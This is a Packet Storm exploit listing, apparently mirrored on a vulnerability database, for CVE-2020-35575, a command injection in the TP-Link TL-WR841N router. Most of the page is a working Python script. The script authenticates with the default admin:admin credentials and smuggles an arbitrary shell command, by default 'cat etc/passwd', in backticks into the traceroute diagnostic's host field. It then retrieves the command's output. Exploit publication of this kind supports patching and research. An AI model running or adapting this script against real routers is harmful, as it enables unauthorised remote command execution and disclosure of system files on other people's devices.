TP-Link TL-WR841N Command Injection

🗓️ 24 Jun 2021 00:00:00Reported by Koh You LiangType

packetstorm🔗 packetstormsecurity.com👁 933 Views

TP-Link TL-WR841N Command Injection, CVE-2020-35575, Exploi

Reporter	Title	Published	Views	Family All 10
0day.today	TP-Link TL-WR841N - Command Injection Exploit	25 Jun 202100:00	–	zdt
Circl	CVE-2020-35575	26 Dec 202007:26	–	circl
CNNVD	Multiple Tp-Link Router Products Information Disclosure Vulnerability	25 Dec 202000:00	–	cnnvd
Check Point Advisories	TP-Link Multiple Products Remote Code Execution (CVE-2020-35575)	29 Sep 202100:00	–	checkpoint_advisories
CVE	CVE-2020-35575	26 Dec 202002:02	–	cve
Cvelist	CVE-2020-35575	26 Dec 202002:02	–	cvelist
NVD	CVE-2020-35575	26 Dec 202002:15	–	nvd
OSV	CVE-2020-35575	26 Dec 202002:15	–	osv
Prion	Cross site scripting	26 Dec 202002:15	–	prion
RedhatCVE	CVE-2020-35575	22 May 202517:11	–	redhatcve

`# Exploit Title: TP-Link TL-WR841N - Command Injection  
# Date: 2020-12-13  
# Exploit Author: Koh You Liang  
# Vendor Homepage: https://www.tp-link.com/  
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip  
# Version: TL-WR841N 0.9.1 4.0  
# Tested on: Windows 10  
# CVE : CVE-2020-35575  
  
import requests  
import sys  
import time  
  
try:  
_ = sys.argv[2]  
payload = ' '.join(sys.argv[1:])  
except IndexError:  
try:  
payload = sys.argv[1]  
except IndexError:  
print("[*] Command not specified, using the default `cat etc/passwd=`")  
payload = 'cat etc/passwd'  
  
# Default credentials is admin:admin - replace with your own  
cookies = {  
'Authorization': 'Basic YWRtaW46YWRtaW4='  
}  
  
headers = {  
'Host': '192.168.0.1',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',  
'Accept': '*/*',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'text/plain',  
'Content-Length': '197',  
'Origin': 'http://192.168.0.1',  
'Connection': 'close',  
'Referer': 'http://192.168.0.1/mainFrame.htm',  
}  
  
data1 = \  
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)  
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)  
print('[+] Sending payload...')  
  
try:  
response1.text.splitlines()[0]  
except IndexError:  
sys.exit('[-] Cannot get response. Please check your cookie.')  
if response1.text.splitlines()[0] != '[error]0':  
sys.exit('[*] Router/Firmware is not vulnerable.')  
  
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'  
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)  
print('[+] Receiving response from router...')  
time.sleep(0.8) # Buffer time for traceroute to succeed  
  
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''  
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)  
  
if '=:' in response3.text.splitlines()[3]:  
print('[-] Command not supported.')  
else:  
print('[+] Exploit successful!')  
for line_number, line in enumerate(response3.text.splitlines()):  
try:  
if line_number == 3:  
print(line[12:])  
if line_number > 3 and line != '[error]0':  
print(line)  
if 'not known' in line:  
break  
except IndexError:  
break  
  
`

24 Jun 2021 00:00Current

9.7High risk

Vulners AI Score9.7

EPSS0.18786